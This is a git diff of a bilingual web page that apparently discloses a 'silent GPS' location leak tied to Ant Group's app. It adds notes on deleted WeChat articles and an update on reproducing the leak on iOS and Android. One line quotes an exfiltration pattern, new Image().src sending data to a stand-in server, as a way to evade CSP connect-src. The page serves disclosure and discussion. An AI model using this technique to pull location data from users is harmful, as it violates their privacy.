diff --git a/index.html b/index.html index df3cc6a..135f589 100644 --- a/index.html +++ b/index.html @@ -515,81 +515,66 @@ body.lang-en .en { display: block; } - +
https://innora.ai/zfb/)https://innora.ai/zfb/)+ 被删除的 4 篇文章: + 4 Deleted Articles: +
+
+ 微信平台删除通知 (1/2)WeChat deletion notice (1/2)
+
+ 微信平台删除通知 (2/2)WeChat deletion notice (2/2)
+freshnn 报告 iOS 可以调用并打开相关页面,但服务端收不到数据;Android 上「无感 GPS」则复现成功。
可能原因:
connect-src 指令,阻止向外部域发送请求new Image().src = "https://server/log?data=...")属于 simple request 且不受 connect-src 限制技术修正:感谢 meooxx 指出 CORS 是浏览器端策略——它阻止的是浏览器读取 response,不阻止 request 到达服务器。对于 simple request,服务器一定会收到请求。
关键事实:我们的 iPhone 16 Pro (iOS 18.3) 测试确实成功获取了 GPS 数据(记录在服务器日志中),蚂蚁集团安全负责人的 iPhone 在杭州的测试也被我们成功获取了坐标。iOS 复现需要满足特定的服务器配置条件,并非漏洞不存在。
我们将在 Issue #5 中提供详细的 iOS 复现排查指南。
freshnn reported that iOS can invoke and open the relevant pages, but the server receives no data; Android "silent GPS" was successfully reproduced.
Possible causes:
connect-src directives that block requests to external domainsnew Image().src = "https://server/log?data=...") which is a simple request not restricted by connect-srcTechnical correction: Thanks to meooxx for pointing out that CORS is a browser-side policy — it blocks the browser from reading the response, not the request from reaching the server. For simple requests, the server always receives the request.
Key fact: Our iPhone 16 Pro (iOS 18.3) test did successfully obtain GPS data (recorded in server logs). Ant Group's security lead's iPhone in Hangzhou was also successfully captured. iOS reproduction requires specific server configuration — the vulnerability exists, but the PoC setup matters.
We will provide a detailed iOS reproduction troubleshooting guide in Issue #5.